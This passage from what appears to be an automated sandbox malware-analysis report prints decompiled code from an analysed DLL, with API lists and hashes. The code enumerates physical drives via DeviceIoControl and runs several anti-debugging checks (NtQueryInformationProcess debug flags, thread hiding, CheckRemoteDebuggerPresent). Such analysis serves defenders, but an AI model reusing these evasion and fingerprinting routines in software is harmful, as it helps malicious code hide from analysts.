                                                                                                                                                                          • Opcode Fuzzy Hash: 2aa39ac6cad2a8bb26720dc438c81d79ebe9cbc317c692aee15183ecf2d7af76
                                                                                                                                                                          • Instruction Fuzzy Hash: 8C613AB4D04258DBDB20EF94CC94BAEBBB0FB44308F1081D9D548AB281DB759AC4CF95
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 1001D7E0, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                          			E1001D7E0(void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				signed short* _v44;
				void* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				char _v570;
				short _v572;
				char _v1596;
				void* _v1600;
				char _v1604;
				long _v1608;
				signed int _v1612;
				void* _v1616;
				void* _v1620;
				void* _v1624;
				void* _v1628;
				void* _v1632;
				signed int _v1633;
				void _v1636;
				char _v2148;
				char _v2164;
				void* _t73;
				int _t78;
				void* _t88;
				void* _t94;
				void* _t123;
				void* _t124;

				_t123 = __edi;
				_v52 = _a4;
				if(_a4 == 0) {
					L18:
					return 0;
				}
				_v1600 = 0;
				_v1612 = 0;
				while(1 != 0) {
					_v572 = 0;
					E1000CF20(_t123,  &_v570, 0, 0x1fe);
					wsprintfW( &_v572, L"\\\\.\\PhysicalDrive%d", _v1612);
					_t124 = _t124 + 0x18;
					_t73 = CreateFileW( &_v572, 0xc0000000, 3, 0, 3, 0, 0); // executed
					_v48 = _t73;
					if(_v48 == 0xffffffff) {
						L15:
						_v1612 = 1 + _v1612;
						if(_v1612 < 4) {
							continue;
						}
						return _v1600;
					}
					_v1608 = 0;
					_v1636 = 0;
					_v1632 = 0;
					_v1628 = 0;
					_v1624 = 0;
					_v1620 = 0;
					_v1616 = 0;
					_t78 = DeviceIoControl(_v48, 0x74080, 0, 0,  &_v1636, 0x18,  &_v1608, 0); // executed
					if(_t78 == 0) {
						CloseHandle(_v48);
						goto L15;
					}
					if((_v1633 & 0x000000ff) == 0) {
						L11:
						CloseHandle(_v48);
						if(_v1600 == 0) {
							goto L15;
						}
						return _v1600;
					}
					asm("sbb edx, edx");
					_v1604 = ( ~((_v1633 & 0x000000ff) >> _v1612 & 0x00000010) & 0xffffffb5) + 0xec;
					_v40 = 0;
					_v36 = 0;
					_v32 = 0;
					_v28 = 0;
					_v24 = 0;
					_v20 = 0;
					_v16 = 0;
					_v12 = 0;
					_v8 = 0;
					E1000CF20(_t123,  &_v2164, 0, 0x210);
					_t88 = E1001CF20( &_v40, _v1612, _v48,  &_v2164, _v1604,  &_v1608);
					_t124 = _t124 + 0x24;
					if(_t88 == 0) {
						goto L11;
					}
					_v60 =  &_v1596;
					_v44 =  &_v2148;
					do {
						 *_v60 =  *_v44 & 0x0000ffff;
						_v44 =  &(_v44[1]);
						_v60 =  &(_v60[1]);
					} while (_v44 <  &_v1636);
					_v56 = E1001CD70( &_v1596);
					_t94 = E1001CFA0(_v56, 0x104, _v52);
					_t124 = _t124 + 0x10;
					if(_t94 == 0) {
						_v1600 = 1;
					}
					goto L11;
				}
				goto L18;
			}







































                                                                                                                                                                          0x1001d7e0
                                                                                                                                                                          0x1001d7ec
                                                                                                                                                                          0x1001d7f3
                                                                                                                                                                          0x1001da64
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001da64
                                                                                                                                                                          0x1001d7f9
                                                                                                                                                                          0x1001d803
                                                                                                                                                                          0x1001d80d
                                                                                                                                                                          0x1001d81a
                                                                                                                                                                          0x1001d831
                                                                                                                                                                          0x1001d84c
                                                                                                                                                                          0x1001d852
                                                                                                                                                                          0x1001d86b
                                                                                                                                                                          0x1001d871
                                                                                                                                                                          0x1001d878
                                                                                                                                                                          0x1001da3d
                                                                                                                                                                          0x1001da4c
                                                                                                                                                                          0x1001da55
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001da5f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001da57
                                                                                                                                                                          0x1001d87e
                                                                                                                                                                          0x1001d888
                                                                                                                                                                          0x1001d892
                                                                                                                                                                          0x1001d89c
                                                                                                                                                                          0x1001d8a6
                                                                                                                                                                          0x1001d8b0
                                                                                                                                                                          0x1001d8ba
                                                                                                                                                                          0x1001d8e3
                                                                                                                                                                          0x1001d8eb
                                                                                                                                                                          0x1001da37
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001da37
                                                                                                                                                                          0x1001d8fa
                                                                                                                                                                          0x1001da16
                                                                                                                                                                          0x1001da1a
                                                                                                                                                                          0x1001da27
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001da31
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001da29
                                                                                                                                                                          0x1001d914
                                                                                                                                                                          0x1001d91f
                                                                                                                                                                          0x1001d925
                                                                                                                                                                          0x1001d92c
                                                                                                                                                                          0x1001d933
                                                                                                                                                                          0x1001d93a
                                                                                                                                                                          0x1001d941
                                                                                                                                                                          0x1001d948
                                                                                                                                                                          0x1001d94f
                                                                                                                                                                          0x1001d956
                                                                                                                                                                          0x1001d95d
                                                                                                                                                                          0x1001d96f
                                                                                                                                                                          0x1001d99b
                                                                                                                                                                          0x1001d9a0
                                                                                                                                                                          0x1001d9a5
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001d9ad
                                                                                                                                                                          0x1001d9b6
                                                                                                                                                                          0x1001d9b9
                                                                                                                                                                          0x1001d9c2
                                                                                                                                                                          0x1001d9ca
                                                                                                                                                                          0x1001d9d3
                                                                                                                                                                          0x1001d9dc
                                                                                                                                                                          0x1001d9f0
                                                                                                                                                                          0x1001da00
                                                                                                                                                                          0x1001da05
                                                                                                                                                                          0x1001da0a
                                                                                                                                                                          0x1001da0c
                                                                                                                                                                          0x1001da0c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001da0a
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                          • _memset.LIBCMT ref: 1001D831
                                                                                                                                                                          • wsprintfW.USER32 ref: 1001D84C
                                                                                                                                                                          • CreateFileW.KERNELBASE(00000000,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 1001D86B
                                                                                                                                                                          • DeviceIoControl.KERNELBASE(000000FF,00074080,00000000,00000000,00000000,00000018,00000000,00000000), ref: 1001D8E3
                                                                                                                                                                          • _memset.LIBCMT ref: 1001D96F
                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 1001DA1A
                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 1001DA37
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandle_memset$ControlCreateDeviceFilewsprintf
                                                                                                                                                                          • String ID: \\.\PhysicalDrive%d
                                                                                                                                                                          • API String ID: 381188756-2935326385
                                                                                                                                                                          • Opcode ID: 228ac608f1b5d7182a6ce1183333a69992f212d465b9132994bd91ad4db78590
                                                                                                                                                                          • Instruction ID: e843174948dd7abc5fb59b2edd762e96836351ae516af004f3d86572885adcf9
                                                                                                                                                                          • Opcode Fuzzy Hash: 228ac608f1b5d7182a6ce1183333a69992f212d465b9132994bd91ad4db78590
                                                                                                                                                                          • Instruction Fuzzy Hash: 21613DB1D04218ABEB20DF54CC95BDDB7B6EF84304F148199E509BB280D776AA94CF91
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 1001DA70, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                                                          			E1001DA70(void* __edi, intOrPtr _a4) {
				struct _OVERLAPPED* _v8;
				struct _OVERLAPPED* _v12;
				void* _v16;
				short _v532;
				struct _OVERLAPPED* _v536;
				struct _OVERLAPPED* _v540;
				void _v544;
				long _v548;
				struct _OVERLAPPED* _v552;
				intOrPtr _v10532;
				void _v10556;
				char _v11556;
				void* _t43;
				int _t48;
				void* _t56;
				void* _t70;
				void* _t71;

				_t70 = __edi;
				E10018AA0(0x2d20);
				if(_a4 == 0) {
					L13:
					return 0;
				}
				_v8 = 0;
				_v12 = 0;
				_v552 = 0;
				while(1 != 0) {
					wsprintfW( &_v532, L"\\\\.\\PhysicalDrive%d", _v8);
					_t71 = _t71 + 0xc;
					_t43 = CreateFileW( &_v532, 0, 3, 0, 3, 0, 0); // executed
					_v16 = _t43;
					if(_v16 == 0xffffffff) {
						L10:
						_v8 =  &(_v8->Internal);
						_v552 = _v8;
						if(_v8 < 4) {
							continue;
						}
						return _v12;
					}
					_v548 = 0;
					_v536 = 0;
					_v544 = 0;
					_v540 = 0;
					E1000CF20(_t70,  &_v10556, 0, 0x2710);
					_t71 = _t71 + 0xc;
					_t48 = DeviceIoControl(_v16, 0x2d1400,  &_v544, 0xc,  &_v10556, 0x2710,  &_v548, 0); // executed
					if(_t48 != 0) {
						E1000CF20(_t70,  &_v11556, 0, 0x3e8);
						E1001D040(_v10532,  &_v10556,  &_v11556);
						_t56 = E1001CFA0( &_v11556, 0x104, _a4);
						_t71 = _t71 + 0x24;
						if(_t56 == 0) {
							_v12 = 1;
						}
					}
					FindCloseChangeNotification(_v16); // executed
					if(_v12 == 0) {
						_v8 = _v552;
						goto L10;
					} else {
						return _v12;
					}
				}
				goto L13;
			}




















                                                                                                                                                                          0x1001da70
                                                                                                                                                                          0x1001da78
                                                                                                                                                                          0x1001da81
                                                                                                                                                                          0x1001dbf0
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001dbf0
                                                                                                                                                                          0x1001da87
                                                                                                                                                                          0x1001da8e
                                                                                                                                                                          0x1001da95
                                                                                                                                                                          0x1001da9f
                                                                                                                                                                          0x1001dabc
                                                                                                                                                                          0x1001dac2
                                                                                                                                                                          0x1001dad8
                                                                                                                                                                          0x1001dade
                                                                                                                                                                          0x1001dae5
                                                                                                                                                                          0x1001dbce
                                                                                                                                                                          0x1001dbd4
                                                                                                                                                                          0x1001dbda
                                                                                                                                                                          0x1001dbe4
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001dbeb
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001dbe6
                                                                                                                                                                          0x1001daeb
                                                                                                                                                                          0x1001daf5
                                                                                                                                                                          0x1001daff
                                                                                                                                                                          0x1001db09
                                                                                                                                                                          0x1001db21
                                                                                                                                                                          0x1001db26
                                                                                                                                                                          0x1001db50
                                                                                                                                                                          0x1001db58
                                                                                                                                                                          0x1001db68
                                                                                                                                                                          0x1001db85
                                                                                                                                                                          0x1001db9d
                                                                                                                                                                          0x1001dba2
                                                                                                                                                                          0x1001dba7
                                                                                                                                                                          0x1001dba9
                                                                                                                                                                          0x1001dba9
                                                                                                                                                                          0x1001dba7
                                                                                                                                                                          0x1001dbb4
                                                                                                                                                                          0x1001dbbe
                                                                                                                                                                          0x1001dbcb
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001dbc0
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001dbc0
                                                                                                                                                                          0x1001dbbe
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                          • wsprintfW.USER32 ref: 1001DABC
                                                                                                                                                                          • CreateFileW.KERNELBASE(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 1001DAD8
                                                                                                                                                                          • _memset.LIBCMT ref: 1001DB21
                                                                                                                                                                          • DeviceIoControl.KERNELBASE(000000FF,002D1400,?,0000000C,?,00002710,?,00000000), ref: 1001DB50
                                                                                                                                                                          • _memset.LIBCMT ref: 1001DB68
                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 1001DBB4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _memset$ChangeCloseControlCreateDeviceFileFindNotificationwsprintf
                                                                                                                                                                          • String ID: \\.\PhysicalDrive%d
                                                                                                                                                                          • API String ID: 198797371-2935326385
                                                                                                                                                                          • Opcode ID: 7967e660f866846cce4441d868a450291a2d59336fe704930f3578c37a1dd60c
                                                                                                                                                                          • Instruction ID: bc891f1c4ccce3a70caf683a604835e8428f56d0e5539b736f6604e1ef8a2667
                                                                                                                                                                          • Opcode Fuzzy Hash: 7967e660f866846cce4441d868a450291a2d59336fe704930f3578c37a1dd60c
                                                                                                                                                                          • Instruction Fuzzy Hash: A6412B75D40218EBEB10EB90DC99FDDB7B8EB14704F108599E509AA281D7B4AB88CF91
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 10019F00, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 26librarynativeloaderCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E10019F00() {
				void _v8;
				_Unknown_base(*)()* _v12;
				struct HINSTANCE__* _v16;

				_v8 = 1;
				_v16 = LoadLibraryA("Ntdll.dll");
				_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
				NtQueryInformationProcess(GetCurrentProcess(), 0x1f,  &_v8, 4, 0);
				return 0 | _v8 != 0x00000001;
			}






                                                                                                                                                                          0x10019f06
                                                                                                                                                                          0x10019f18
                                                                                                                                                                          0x10019f2a
                                                                                                                                                                          0x10019f3e
                                                                                                                                                                          0x10019f4d

                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryA.KERNEL32(Ntdll.dll), ref: 10019F12
                                                                                                                                                                          • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 10019F24
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(0000001F,00000001,00000004,00000000), ref: 10019F37
                                                                                                                                                                          • NtQueryInformationProcess.NTDLL(00000000), ref: 10019F3E
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$AddressCurrentInformationLibraryLoadProcQuery
                                                                                                                                                                          • String ID: NtQueryInformationProcess$Ntdll.dll
                                                                                                                                                                          • API String ID: 3653371871-801751246
                                                                                                                                                                          • Opcode ID: 299e7fd2ffe35789e5c5ceba6014bb3d0f648db3e037f5c09f603e7f91a54977
                                                                                                                                                                          • Instruction ID: 96ba2470dd98e020bf0cfbce012c3df4c205278cc2531598ec11657ea2300d3b
                                                                                                                                                                          • Opcode Fuzzy Hash: 299e7fd2ffe35789e5c5ceba6014bb3d0f648db3e037f5c09f603e7f91a54977
                                                                                                                                                                          • Instruction Fuzzy Hash: F5F03075D00208FFEB00DFE0CC8DADCBB74EB04301F508094FA01A6140D6745A48CB61
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 10019F50, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 26librarynativeloaderCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E10019F50() {
				void _v8;
				_Unknown_base(*)()* _v12;
				struct HINSTANCE__* _v16;

				_v8 = 0;
				_v16 = LoadLibraryA("Ntdll.dll");
				_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
				NtQueryInformationProcess(GetCurrentProcess(), 0x1e,  &_v8, 4, 0);
				return 0 | _v8 != 0x00000000;
			}






                                                                                                                                                                          0x10019f56
                                                                                                                                                                          0x10019f68
                                                                                                                                                                          0x10019f7a
                                                                                                                                                                          0x10019f8e
                                                                                                                                                                          0x10019f9d

                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryA.KERNEL32(Ntdll.dll), ref: 10019F62
                                                                                                                                                                          • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 10019F74
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(0000001E,00000000,00000004,00000000), ref: 10019F87
                                                                                                                                                                          • NtQueryInformationProcess.NTDLL(00000000), ref: 10019F8E
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$AddressCurrentInformationLibraryLoadProcQuery
                                                                                                                                                                          • String ID: NtQueryInformationProcess$Ntdll.dll
                                                                                                                                                                          • API String ID: 3653371871-801751246
                                                                                                                                                                          • Opcode ID: 5324bd590ae2d935f737936b9c2bb7a29ce3f6ecd0286ca9cc490fcedce8d1c6
                                                                                                                                                                          • Instruction ID: 4290971ec9e7b3841b7fe9691c0d5d42a9a3d927b1d111e6c5789e877817e371
                                                                                                                                                                          • Opcode Fuzzy Hash: 5324bd590ae2d935f737936b9c2bb7a29ce3f6ecd0286ca9cc490fcedce8d1c6
                                                                                                                                                                          • Instruction Fuzzy Hash: 7FF0A575900218FBEB00EBE0DD89BDDBBB8EB04705F618498EA01A6280DA745A49DB65
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 10019FA0, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 26librarynativeloaderCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E10019FA0() {
				void _v8;
				_Unknown_base(*)()* _v12;
				struct HINSTANCE__* _v16;

				_v8 = 0;
				_v16 = LoadLibraryA("Ntdll.dll");
				_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
				NtQueryInformationProcess(GetCurrentProcess(), 7,  &_v8, 4, 0);
				return 0 | _v8 != 0x00000000;
			}






                                                                                                                                                                          0x10019fa6
                                                                                                                                                                          0x10019fb8
                                                                                                                                                                          0x10019fca
                                                                                                                                                                          0x10019fde
                                                                                                                                                                          0x10019fed

                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryA.KERNEL32(Ntdll.dll), ref: 10019FB2
                                                                                                                                                                          • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 10019FC4
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000007,00000000,00000004,00000000), ref: 10019FD7
                                                                                                                                                                          • NtQueryInformationProcess.NTDLL(00000000), ref: 10019FDE
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$AddressCurrentInformationLibraryLoadProcQuery
                                                                                                                                                                          • String ID: NtQueryInformationProcess$Ntdll.dll
                                                                                                                                                                          • API String ID: 3653371871-801751246
                                                                                                                                                                          • Opcode ID: e4e449fd2582a4a912ce4590722a3fea1b530a5e0b7ff34467c0788b23f79e4c
                                                                                                                                                                          • Instruction ID: a091bf084543d9cc22bc0e3cc688341cf2a1c1168494879eaf10af3ffd9ffb2e
                                                                                                                                                                          • Opcode Fuzzy Hash: e4e449fd2582a4a912ce4590722a3fea1b530a5e0b7ff34467c0788b23f79e4c
                                                                                                                                                                          • Instruction Fuzzy Hash: EEF0C075D44208FFEB00DFE0DD4DB9DBBB8EB04301F518494FA05A6180D7745A49CB65
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 10019D40, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 20librarythreadnativeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E10019D40() {
				_Unknown_base(*)()* _v8;
				struct HINSTANCE__* _v12;

				_v12 = LoadLibraryA("Ntdll.dll");
				_v8 = GetProcAddress(_v12, "ZwSetInformationThread");
				return NtSetInformationThread(GetCurrentThread(), 0x11, 0, 0);
			}





                                                                                                                                                                          0x10019d51
                                                                                                                                                                          0x10019d63
                                                                                                                                                                          0x10019d79

                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryA.KERNEL32(Ntdll.dll,?,100206A1), ref: 10019D4B
                                                                                                                                                                          • GetProcAddress.KERNEL32(?,ZwSetInformationThread), ref: 10019D5D
                                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 10019D6C
                                                                                                                                                                          • NtSetInformationThread.NTDLL(00000000,?,100206A1), ref: 10019D73
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Thread$AddressCurrentInformationLibraryLoadProc
                                                                                                                                                                          • String ID: Ntdll.dll$ZwSetInformationThread
                                                                                                                                                                          • API String ID: 1707985920-1680533912
                                                                                                                                                                          • Opcode ID: 68ad7e6b782c0f1e3664fc4a4fea26a1abbd1340330e0d1141474a821f8a2a15
                                                                                                                                                                          • Instruction ID: 29caf765b55be7bf21a38254d48f72174c1d944e91014696290b2e85dee50fc2
                                                                                                                                                                          • Opcode Fuzzy Hash: 68ad7e6b782c0f1e3664fc4a4fea26a1abbd1340330e0d1141474a821f8a2a15
                                                                                                                                                                          • Instruction Fuzzy Hash: 5CE0EC74940208FBFF00EBE0AD8DB9CBB78FB04702F618095FE01A6280DAB059058AB5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 1001A170, Relevance: 3.0, APIs: 2, Instructions: 21fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E1001A170(CHAR* _a4) {
				struct _WIN32_FIND_DATAA _v324;
				intOrPtr _v328;
				void* _v332;
				void* _t11;

				_v328 = 0;
				_t11 = FindFirstFileA(_a4,  &_v324); // executed
				_v332 = _t11;
				if(_v332 != 0xffffffff) {
					_v328 = _v324.nFileSizeLow;
				}
				FindClose(_v332); // executed
				return _v328;
			}







                                                                                                                                                                          0x1001a179
                                                                                                                                                                          0x1001a18e
                                                                                                                                                                          0x1001a194
                                                                                                                                                                          0x1001a1a1
                                                                                                                                                                          0x1001a1a9
                                                                                                                                                                          0x1001a1a9
                                                                                                                                                                          0x1001a1b6
                                                                                                                                                                          0x1001a1c5

                                                                                                                                                                          APIs
                                                                                                                                                                          • FindFirstFileA.KERNELBASE(1001A679,?), ref: 1001A18E
                                                                                                                                                                          • FindClose.KERNELBASE(000000FF), ref: 1001A1B6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2295610775-0
                                                                                                                                                                          • Opcode ID: 0d0f7e1b90d12563d86b766f37a796064df2748116d1dddbb477bfb1d1da362b
                                                                                                                                                                          • Instruction ID: 097559f34e7186eb2c7e5fd791b7ca3a953ceb1394cb31efbd5b4482c630521c
                                                                                                                                                                          • Opcode Fuzzy Hash: 0d0f7e1b90d12563d86b766f37a796064df2748116d1dddbb477bfb1d1da362b
                                                                                                                                                                          • Instruction Fuzzy Hash: 66F0C974D0022C9BDB70DF64DD88BDDB7B8AB48310F1042D4E91DA32A0DA30AED58F50
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 10019FF0, Relevance: 3.0, APIs: 2, Instructions: 12COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 37%
                                                                                                                                                                          			E10019FF0(void* __ecx) {
				char _v8;

				__imp__CheckRemoteDebuggerPresent(GetCurrentProcess(),  &_v8, __ecx); // executed
				return _v8;
			}




                                                                                                                                                                          0x10019fff
                                                                                                                                                                          0x1001a00b

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000001,?,?,1001A032,?,?,1001A0C0), ref: 10019FF8
                                                                                                                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(00000000,?,?,1001A032,?,?,1001A0C0), ref: 10019FFF
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CheckCurrentDebuggerPresentProcessRemote
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3244773808-0
                                                                                                                                                                          • Opcode ID: 8cf1fe81f6f864816b257ae7aa1445d5809d52eafb48723ac30665233529113e
                                                                                                                                                                          • Instruction ID: 1968f35720b6d0cf004a0d8eaef2a233a09a3f8537d50a9d5b5f9af22a971398
